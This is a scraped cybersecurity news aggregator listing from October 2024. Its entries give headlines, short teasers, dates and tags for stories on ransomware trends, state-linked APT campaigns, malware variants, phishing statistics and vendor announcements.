In a world where cyber threats feel omnipresent, a recent report has revealed some unexpected good news: ransomware attacks on state and local governments have dropped by 51% in 2024. Still, this decline does not signal the end of the ransomware threat, nor should it lead to complacency. As the nature of ransomware evolves, so […]
2024-10-18T13:00:00+00:00 https://securityintelligence.com/articles/whats-behind-51-drop-in-ransomware-attacks/ www.secnews.physaphae.fr/article.php?IdArticle=8599761 False Ransomware,Threat None 3.0000000000000000

Recorded Future (Recorded Future feed)
Refresh of RomCom malware pops up in Ukrainian, Polish organizations
A newly identified variant of RomCom malware, which has been attributed to Russian-speaking threat actors, targeted entities in Ukraine and Poland, according to researchers.
2024-10-18T12:32:29+00:00 https://therecord.media/romcom-malware-variant-ukraine-poland-espionage www.secnews.physaphae.fr/article.php?IdArticle=8599718 False Malware,Threat None 2.0000000000000000

We Live Security (ESET antivirus software vendor)
Threat actors exploiting zero-days faster than ever – Week in security with Tony Anscombe
The average time it takes attackers to weaponize a vulnerability, either before or after a patch is released, shrank from 63 days in 2018-2019 to just five days last year.
2024-10-18T12:10:04+00:00 https://www.welivesecurity.com/en/videos/threat-actors-exploiting-zero-days-faster-ever-week-security-tony-anscombe/ www.secnews.physaphae.fr/article.php?IdArticle=8600023 False Vulnerability,Threat None 2.0000000000000000

SecurityWeek (Security News)
North Korean APT Exploited IE Zero-Day in Supply Chain Attack
A Pyongyang-aligned APT was caught exploiting a recent zero-day in Internet Explorer in a supply chain attack.
2024-10-18T11:18:15+00:00 https://www.securityweek.com/north-korean-apt-exploited-ie-zero-day-in-supply-chain-attack/ www.secnews.physaphae.fr/article.php?IdArticle=8599693 False Vulnerability,Threat None 4.0000000000000000
The Hacker News (a hacking news blog, surprisingly enough)
Russian RomCom Attacks Target Ukrainian Government with New SingleCamper RAT Variant
The Russian threat actor known as RomCom has been linked to a new wave of cyber attacks aimed at Ukrainian government agencies and unknown Polish entities since at least late 2023. The intrusions are characterized by the use of a variant of the RomCom RAT dubbed SingleCamper (aka SnipBot or RomCom 5.0), said Cisco Talos, which is monitoring the activity cluster under the moniker UAT-5647. "This [...]
2024-10-17T21:43:00+00:00 https://thehackernews.com/2024/10/russian-romcom-attacks-target-ukrainian.html www.secnews.physaphae.fr/article.php?IdArticle=8599318 False Threat None 3.0000000000000000

RiskIQ (cyber risk firm, now Microsoft)
IcePeony with the '996' work culture
2024-10-17T20:34:10+00:00 https://community.riskiq.com/article/f496ca75 www.secnews.physaphae.fr/article.php?IdArticle=8599428 False Ransomware,Malware,Tool,Vulnerability,Threat None 3.0000000000000000

The Hacker News (a hacking news blog, surprisingly enough)
Researchers Uncover Cicada3301 Ransomware Operations and Its Affiliate Program
Cybersecurity researchers have gleaned additional insights into a nascent ransomware-as-a-service (RaaS) called Cicada3301 after successfully gaining access to the group's affiliate panel on the dark web. Singapore-headquartered Group-IB said it contacted the threat actor behind the Cicada3301 persona on the RAMP cybercrime forum via the Tox messaging service after the latter put out an [...]
2024-10-17T19:24:00+00:00 https://thehackernews.com/2024/10/cross-platform-cicada3301-ransomware.html www.secnews.physaphae.fr/article.php?IdArticle=8599247 False Ransomware,Threat None 3.0000000000000000

RiskIQ (cyber risk firm, now Microsoft)
ClickFix tactic: The Phantom Meet
2024-10-17T18:58:40+00:00 https://community.riskiq.com/article/6d79c4e3 www.secnews.physaphae.fr/article.php?IdArticle=8599384 True Ransomware,Malware,Tool,Threat,Conference None 3.0000000000000000

RiskIQ (cyber risk firm, now Microsoft)
Genuine Signing Certificates Found Used by HijackLoader
2024-10-17T17:29:10+00:00 https://community.riskiq.com/article/ef6514e6 www.secnews.physaphae.fr/article.php?IdArticle=8599361 False Malware,Threat None 3.0000000000000000

Korben (French blogger)
Windows 95 on the Nintendo 3DS - as fun as it is useless
2024-10-17T17:04:25+00:00 https://korben.info/windows-95-sur-nintendo-3ds-prouesse-technique-amusante.html www.secnews.physaphae.fr/article.php?IdArticle=8599316 False Threat None 3.0000000000000000

The Hacker News (a hacking news blog, surprisingly enough)
SideWinder APT Strikes Middle East and Africa With Stealthy Multi-Stage Attack
An advanced persistent threat (APT) actor with suspected ties to India has sprung forth with a flurry of attacks against high-profile entities and strategic infrastructures in the Middle East and Africa. The activity has been attributed to a group tracked as SideWinder, which is also known as APT-C-17, Baby Elephant, Hardcore Nationalist, Leafperforator, Rattlesnake, Razor Tiger, and T-APT-04. "[...]
2024-10-17T15:45:00+00:00 https://thehackernews.com/2024/10/sidewinder-apt-strikes-middle-east-and.html www.secnews.physaphae.fr/article.php?IdArticle=8599181 False Threat APT-C-17 3.0000000000000000

IndustrialCyber (cyber risk firm for industrial)
Zscaler releases 2024 Threat Report highlighting need for enhanced security in mobile, IoT, OT systems
Cloud security firm Zscaler published on Tuesday its Zscaler ThreatLabz 2024 Mobile, IoT, and OT Threat Report, which [...]
2024-10-17T13:16:53+00:00 https://industrialcyber.co/news/zscaler-releases-2024-threat-report-highlighting-need-for-enhanced-security-in-mobile-iot-ot-systems/ www.secnews.physaphae.fr/article.php?IdArticle=8599250 False Threat,Mobile,Industrial None 3.0000000000000000

Checkpoint (security hardware vendor)
Check Point Research Unveils Q3 2024 Brand Phishing Trends: Microsoft Remains Most Imitated Brand as Alibaba and Adobe Enter Top 10
Microsoft is identified as the primary target in phishing attacks, with significant shifts observed in the Top 10 rankings. In the realm of cyber security, phishing attacks are among the most prevalent threats, often serving as the initial step for larger-scale campaigns within supply chains. Check Point Research (CPR), the Threat Intelligence arm of Check Point® Software Technologies Ltd., has recently released its latest Brand Phishing Ranking for the third quarter of 2024. This report sheds light on the brands most frequently imitated by cyber criminals in their attempts to deceive and steal personal information or payment credentials, emphasizing the […]
2024-10-17T13:00:19+00:00 https://blog.checkpoint.com/research/check-point-research-unveils-q3-2024-brand-phishing-trends-microsoft-remains-most-imitated-brand-as-alibaba-and-adobe-enter-top-10/ www.secnews.physaphae.fr/article.php?IdArticle=8599223 False Threat None 2.0000000000000000
Korben - French blogger
Surfshark One: a complete antivirus against new threats with Surfshark – Since its beginnings in 2018, Surfshark has been known mostly for its VPN service. But over the years they have built a fairly complete security suite called Surfshark One. This all-in-one solution aims to protect users (yes, you, the one reading this) against a whole heap of online threats. We will take a closer look at this tool's features and its relevance in the face of new cybersecurity challenges.
2024-10-17T10:00:00+00:00 https://korben.info/surfshark-one-antivirus.html www.secnews.physaphae.fr/article.php?IdArticle=8599133 False Threat None 2.0000000000000000

AlienVault Lab Blog - AlienVault is a major defensive player in IOCs
Pitfalls of Cloud Sprawl and How to Avoid Them
97% of cloud applications used in the enterprise are unmanaged and freely adopted by employees and organizational units. This may seem like minor foul play for the sake of higher productivity, but the downside soon becomes evident. IT teams lose visibility over the “snowballing” cloud ecosystem that suddenly lacks centralized control and potentially opens up a Pandora’s box.
Walking a Security Tightrope
When cloud sprawl takes over, security problems surface. Without unified oversight, applying consistent security measures across the board becomes an arduous task. This lack of control can impact the company’s security in several ways:
Data security gaps: Shadow IT, coupled with too many isolated cloud environments, makes it difficult for IT and security teams to keep a record of sensitive data effectively. This leads to potential data leak or loss.
IAM challenges: Cloud accounts that are no longer maintained tend to have weak access controls. This condition complicates identity and access management (IAM), making it harder to protect credentials like API keys and tokens.
Expanded attack surface: Each unused or poorly managed cloud resource can become a blind spot, making the environment more vulnerable to cyberattacks. Outdated software, misconfigured settings, and unauthorized access points give malefactors more avenues to exploit.
Compliance repercussions: When it comes to regulatory compliance, fragmented data across multiple clouds throws a spanner in the works. Standards like GDPR, HIPAA, and PCI DSS require clear control over data integrity and traceability, but when data storage and security practices aren’t unified, demonstrating compliance becomes a tall order.
These risks entail operational difficulties as IT teams juggle vulnerability management, access controls, and security monitoring. Letting the situation slide creates loopholes for cyber threats. A centralized cloud management approach ensures that growth doesn’t outpace oversight.
Operational and Financial Fallout
Cloud sprawl doesn’t just affect security; it also strains budgets and resources. Orphaned or underused cloud instances add to operational costs and make it hard for organizations to track and optimize their cloud spending. The result is an inflated cloud bill, driven by inefficiencies that could otherwise be avoided. The proliferation of duplicate resources and data across platforms drains processing power, slowing down business-critical
2024-10-17T10:00:00+00:00 https://cybersecurity.att.com/blogs/security-essentials/pitfalls-of-cloud-sprawl-and-how-to-avoid-them www.secnews.physaphae.fr/article.php?IdArticle=8599154 False Tool,Vulnerability,Threat,Cloud None 3.0000000000000000

ProofPoint - Cyber Firms
Mobile Political Spam Volume Continues Rapid Growth in the Lead Up to the U.S. November Elections
Since our July blog, which focused on the increase in mobile political spam volume, unwanted political messaging has continued to grow at a rapid pace. Subscriber reports of these messages increased 67% in September compared with June. We can expect the increases to not only continue, but to accelerate as we approach the November election. As we previously pointed out, most political messaging comes from political action committees, parties and candidates seeking support and donations. Although for many people these messages
2024-10-17T07:31:27+00:00 https://www.proofpoint.com/us/blog/email-and-cloud-threats/spam-text-messages-dos-donts www.secnews.physaphae.fr/article.php?IdArticle=8599221 False Spam,Threat,Mobile,Commercial None 3.0000000000000000

ProofPoint - Cyber Firms
Proofpoint Appoints John Abel as Chief Information Officer
We are delighted to announce that John Abel has been appointed as Proofpoint's SVP and Chief Information Officer (CIO), effective immediately. John is a seasoned and dynamic technology leader with over 30 years of experience in the IT and security industry, working at global Fortune 500 technology companies, managing teams of over 300 people and overseeing budgets of over $200M. Having led multiple transformations of the IT business function, John has an excellent track record of achieving results by developing strong business relationships, building high-quality teams, and providing best-in-class services. Most recently, John was SVP and CIO at Extreme Networks and prior to that, held senior roles at Veritas, Ellie Mae, Hitachi Data Systems (HDS) and Symantec Corporation. In his new role, John will be responsible for aligning Proofpoint's information technology, global information security, and digital transformation initiatives with the company strategy and business goals. As a business-facing CIO, he will be an important voice of the customer for Proofpoint's product teams. Commenting on his appointment, John said: “Proofpoint is trusted by some of the world's leading organizations and is at the forefront of cybersecurity innovation. I believe its human-centric approach and unparalleled insights into the threat landscape set it apart from the competition. I am thrilled to join such a dynamic, transformative company and I look forward to building on the exceptional work underway to advance how Proofpoint helps organizations on their jo
2024-10-17T06:00:02+00:00 https://www.proofpoint.com/us/blog/corporate-news/proofpoint-appoints-john-abel-chief-information-officer www.secnews.physaphae.fr/article.php?IdArticle=8599293 False Threat None 2.0000000000000000

Dark Reading - Informationweek Branch
Iran's APT34 Abuses MS Exchange to Spy on Gulf Gov'ts
A MOIS-aligned threat group has been using Microsoft Exchange servers to exfiltrate sensitive data from Gulf-state government agencies.
2024-10-17T06:00:00+00:00 https://www.darkreading.com/cyberattacks-data-breaches/iran-apt34-ms-exchange-spy-gulf-govts www.secnews.physaphae.fr/article.php?IdArticle=8599077 False Threat APT 34 2.0000000000000000

Intigriti - Blog
12 incident response metrics your business should be tracking
If there's a vulnerability in your systems that cybercriminals could exploit, you'll want to know about it. Collaborating with people outside your organization to alert you to these issues can be extremely powerful because it allows your business to discover vulnerabilities before malicious hackers do. This approach, known as vulnerability disclosure, requires clear reporting c…
2024-10-17T00:00:00+00:00 https://blog.intigriti.com/business-insights/12-incident-response-metrics-your-business-should-be-tracking www.secnews.physaphae.fr/article.php?IdArticle=8600896 False Vulnerability,Threat None 3.0000000000000000

Recorded Future - Recorded Future feed
Hacker allegedly behind attacks on FBI, Airbus, National Public Data arrested in Brazil
Police did not name the suspect, but a threat actor known as USDoD has long boasted of being behind the attacks that were highlighted by Brazilian law enforcement following the arrest.
2024-10-16T23:57:14+00:00 https://therecord.media/hacker-behind-fbi-npd-airbus-attacks-arrested-brazil www.secnews.physaphae.fr/article.php?IdArticle=8598974 False Threat,Legislation None 3.0000000000000000

The Hacker News - The Hacker News is a hacking news blog (surprising, right?)
Hackers Abuse EDRSilencer Tool to Bypass Security and Hide Malicious Activity
Threat actors are attempting to abuse the open-source EDRSilencer tool as part of efforts to tamper endpoint detection and response (EDR) solutions and hide malicious activity. Trend Micro said it detected "threat actors attempting to integrate EDRSilencer in their attacks, repurposing it as a means of evading detection." EDRSilencer, inspired by the NightHawk FireBlock tool from MDSec, is
2024-10-16T21:51:00+00:00 https://thehackernews.com/2024/10/hackers-abuse-edrsilencer-tool-to.html www.secnews.physaphae.fr/article.php?IdArticle=8598821 False Tool,Threat None 3.0000000000000000